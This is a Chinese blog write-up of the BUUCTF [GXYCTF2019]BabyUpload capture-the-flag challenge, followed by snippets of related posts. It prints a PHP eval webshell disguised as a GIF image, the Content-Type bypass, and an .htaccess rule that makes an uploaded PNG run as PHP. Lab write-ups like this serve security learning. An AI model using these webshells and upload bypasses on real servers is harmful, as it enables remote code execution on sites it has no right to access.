BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞

最新推荐文章于 2024-03-03 12:02:10 发布
最新推荐文章于 2024-03-03 12:02:10 发布
阅读量1.8k 收藏 18
点赞数 1
分类专栏: CTF-WEB CTF-WEB-文件漏洞 文章标签: 安全 php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118056249
版权

BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess)

早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!!
首先启动挑战项目
在这里插入图片描述
先正常的上传一句话木马:

GIF89a?
<script language="php">eval($_POST['zyh']);</script>

我经常用这样的一句话木马,为了防止php文件内容被过滤啥的…
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
所以,把传输的文件名改回1.png。但是还是不能上传成功。(好奇怪啊,怎么连图片都不给上传了?)
在这里插入图片描述
然后又发现不管我把后缀名改成.txt .jpeg .gif等等的都不能绕过过滤。最后根据以往的做题经验,想到可能是检测文件类型的Content-Type被拦截了。所以需要把之前的image/png 改成image/jpeg
在这里插入图片描述
在这里插入图片描述
这时你再用蚁剑去连接一下,会发现是会报错的。。。
在这里插入图片描述
在这里插入图片描述
嗯!接下来的才是重点!文件解析漏洞(.htaccess)。
这里需要再上传一个文件.htaccess。用于把我们改成上传的1.png转换成php执行的文件。

.htaccess是什么

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

来源网站:https://www.cnblogs.com/adforce/archive/2012/11/23/2784664.html

那么现在开始编写.htaccess文件的内容:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意里面的1.png要和刚才上传的文件名保持一致!
在这里插入图片描述
该做的准备工作都完成了,可以去拿我们的flag了!
在这里插入图片描述
在这里插入图片描述
flag在根目录下的flag文件下
在这里插入图片描述
在这里插入图片描述

若丶时光破灭
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 533
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
[GXYCTF2019]BabyUpload wp
m0_55185160的博客
03-21 5395
打开题目是一个普通的文件上传,首先上传一个普通的一句话木马得到 发现后缀名过滤了ph,所以我们上传一个图片马 上传类型也受限制了,所以把数据类型改为image/ipeg 诶这里说明它检测的是文本的内容, ...
[GXYCTF2019]BabyUpload(典型图片马基础绕过流程)
EC_Carrot的博客
11-05 2037
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上传php提示不能上传后缀名带ph的文件 再测试上传.htaccess文件 发现改type为image/jpeg能上传成功 到这里不难猜出是图片马getshell了 拿蚁剑连马拿fla
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
最新发布
2302_79800344的博客
03-03 975
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1152
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 2855
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有phpphp的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
BUUCTF [GXYCTF2019]BabyUpload
weixin_45253622的博客
05-26 2054
文件上传题型。 直接上传一句话木马 可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。 key.htaccess文件内容如下: AddType application/x-httpd-php .jpg 抓包修改文件名上传成功。 接着上传图片马,发现; 猜测过滤<?;修改一句话如下: <script language = 'php'>eval($_REQUEST[a]); </script> 构造...
【学习笔记 41】 buu [GXYCTF2019]BabyUpload
weixin_43553654的博客
08-02 510
0x00 知识点 .htaccess文件上传绕过 0x01 知识点详解 请参考我上一篇学习笔记 0x02 解题思路 一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件 <FilesMatch "flag.png"> SetHandler application/x-httpd-php </FilesMatch> 这里注意,这道题不知道为什么,我这
web buuctf [GXYCTF2019]BabyUpload1
weixin_44214568的博客
03-22 792
考点:.htaccess文件, 抓包修改content-type 文件上传漏洞 1.如题: 传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下: GIF89a?<script language="php">@eval($_POST[dd]);</script> 2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。 全局变量覆盖 extarct()变量覆盖 遍历初始化变量 import_request_variables变量覆盖 parse_str()变量覆盖 变量覆盖的种类 全局变量覆盖(PHP5.3.0废弃、PHP5.4.0移除) 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单、cookie等 "; if(ini_get("Register_globals"))foreach ($_REQUEST as $k => $v) unset(${$k}); print $a; print $_GET[b]; ?> extract()变量覆盖 PHP extract()函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素,键名用于变量值
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 559
BUUCTF的wp
Excel中的xls、xlsx、xlsm混合文件,看我用Python如何统一处理......
pdcfighting的博客
02-07 329
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤洞房昨夜停红烛,待晓堂前拜舅姑。引言 Python语言,近几年在办公自动...
[GXYCTF2019]BabyUpload
pakho_C的博客
02-19 872
web第33题 [GXYCTF2019]BabyUpload 打开靶场 一道文件上传的题目 先直接上传图片 上传jpg,png,gif文件都会有这个提示,看来是对MIME类型做了限制,上传一个png文件,将mime类型改为image/jpeg可以上传,但是image/png不行 尝试直接上传php木马文件 提示后缀名不能有ph 添加空格,修改mime类型尝试绕过 又被检测了 仍然尝试绕过,都失败了,思考,提示“诶,别蒙我啊,这标志明显还是php啊”可能是对文件内容做了检测,例如不允许出现&
buuctfUpload-Labs-Linux
07-16
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、绕过文件大小限制等方式来完成挑战。通过完成这些挑战,用户可以提高对上传漏洞的理解和掌握上传漏洞的检测和防范技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值